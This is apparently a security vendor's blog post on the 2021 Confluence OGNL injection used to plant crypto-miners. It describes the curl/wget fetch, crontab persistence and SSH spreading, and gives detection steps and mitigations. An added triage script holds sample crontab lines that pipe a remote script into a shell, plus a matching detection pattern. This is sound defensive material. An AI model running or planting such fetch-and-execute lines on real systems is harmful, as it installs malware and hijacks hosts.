The Confluence vulnerability announced by Atlassian on 26 August 2021 has been exploited in recent days to gain access to systems running the affected Confluence versions.
In most cases, those who exploited the vulnerability did not steal data, but in some cases they successfully turned the machines (servers, VMs, etc.) into crypto-mining bots for a crypto-mining botnet.
What is mining?
To simplify things, the process known as mining is the creation of new transaction blocks, here carried out by the mining bots. Currency is thus exchanged within the botnet and the "miner" receives newly created coins. The miner can then spend these coins for personal gain, for example by using the cryptocurrency to buy items over the internet. This process is called crypto mining.
How does hacking work?
To give you a more accurate insight into the hacking process, we explain the procedure in a little more detail: via an OGNL injection, malicious code can be injected into a Java-based web application or corporate environment. OGNL, or Object-Graph Navigation Language, is an open-source expression language for Java objects. In particular, OGNL enables the evaluation of expression languages in Apache Struts, a framework for developing Java web applications such as Jira or Confluence. The most critical vulnerabilities on the list of Apache Struts CVEs relate to OGNL expression injection attacks that allow the evaluation of invalid expressions against the value stack. This allows an attacker to modify system variables or execute arbitrary code.
Code passed by a malicious person can then be executed remotely. The injected script then downloads another script, which is fetched from another source with the curl or wget command. Once downloaded, it executes itself and deletes all traces of the installation data, which makes its execution harder to analyse and track with monitoring tools.
The installed code uses the crontab, a scheduled-task feature that most Unix-like operating systems ship with, and manipulates the user's crontab to download binaries every minute, for example from bash.givemexyz.in or kdevtmpfsi. After these binaries have been downloaded, the actual mining process begins.
In some cases, the system is searched for known hosts and ssh keys in order to infect further systems.
The miner then uses the entire resources of the system to obtain cryptocurrencies.
How to notice that your system has been accessed:
The most obvious sign is constant 100% utilisation of the system's CPU for an extended period of time. You will also find suspicious crontab entries in /var/spool/cron/crontabs/. In most cases, the Confluence application will stop, but there are a few Confluence processes that can run without the Java runtime environment. Usually the miner will create and use files in /tmp/. In most cases you will find kinsing files on your system.
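The following POSIX shell script is an added example (not part of the original post) that checks a host for the indicators just described: every-minute crontab entries that fetch a remote script with curl or wget and pipe it into a shell, files in /tmp named after the kinsing or kdevtmpfsi miner, and the top CPU consumers. The sample crontab and the EXAMPLE-HOST name are constructed placeholders; `live_scan` is meant to be run as root on the suspected host.

```shell
#!/bin/sh
# Added example, not from the original post: triage checks for the indicators
# described above (minute-interval crontab fetches, miner file names, CPU use).
# The sample crontab and EXAMPLE-HOST are constructed placeholders.

# Exit 0 if a crontab line is an every-minute schedule that fetches a remote
# script with curl/wget and pipes it into a shell; comment lines never match.
suspicious_cron_line() {
    case "$1" in "#"*) return 1 ;; esac
    printf '%s\n' "$1" | grep -Eq \
        '^\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*.*(curl|wget).*\|[[:space:]]*(ba)?sh'
}

# Print the number of suspicious lines in crontab text read from stdin.
count_suspicious_cron() {
    n=0
    while IFS= read -r line || [ -n "$line" ]; do
        suspicious_cron_line "$line" && n=$((n + 1))
    done
    echo "$n"
}

# Exit 0 if a path carries one of the miner file names mentioned in the post.
miner_name_match() {
    case "$(basename "$1")" in
        kinsing*|kdevtmpfsi*) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample crontab for a dry run (not a real capture).
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://EXAMPLE-HOST/x.sh | sh >/dev/null 2>&1
* * * * * curl -fsSL http://EXAMPLE-HOST/y.sh | bash'

# Live host checks; informational output only, intended to be run as root.
live_scan() {
    for f in /var/spool/cron/crontabs/* /etc/cron.d/*; do
        [ -f "$f" ] || continue
        c=$(count_suspicious_cron < "$f")
        [ "$c" -gt 0 ] && echo "$f: $c suspicious crontab line(s)"
    done
    for p in /tmp/* /tmp/.[!.]* /var/tmp/*; do
        [ -e "$p" ] && miner_name_match "$p" && echo "miner-named file: $p"
    done
    echo "top CPU consumers:"; ps -eo pcpu,pid,comm --sort=-pcpu | head -n 5
}

echo "sample crontab: $(printf '%s\n' "$SAMPLE_CRONTAB" | count_suspicious_cron) suspicious line(s)"
```

Source the file and call `live_scan` to run the host checks; the dry run on the sample crontab reports 2 suspicious lines.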
How venITure helps you prevent abuse:
To prevent abuse, you can enable a content security policy to prevent cross-site scripting, clickjacking and other code injection attacks that result from running malicious content in the trusted web page context.
Implement HTTP headers such as 'Strict-Transport-Security', 'Content-Security-Policy', 'X-Frame-Options', 'X-Content-Type-Options', 'Referrer-Policy' and 'Permissions-Policy'. All of these headers enforce policies that make access to the respective resources much more difficult. This can prevent hackers from abusing your web application to gain access to your server.
A web application firewall (WAF) is a special form of application firewall that filters, monitors and blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks that exploit known vulnerabilities in a web application, such as SQL injection, cross-site scripting (XSS), file inclusion, and improper system configuration.
Atlassian recommends updating Confluence to the latest and most secure version.
If you have further questions on the topic or need support in implementing prevention measures, please feel free to contact us.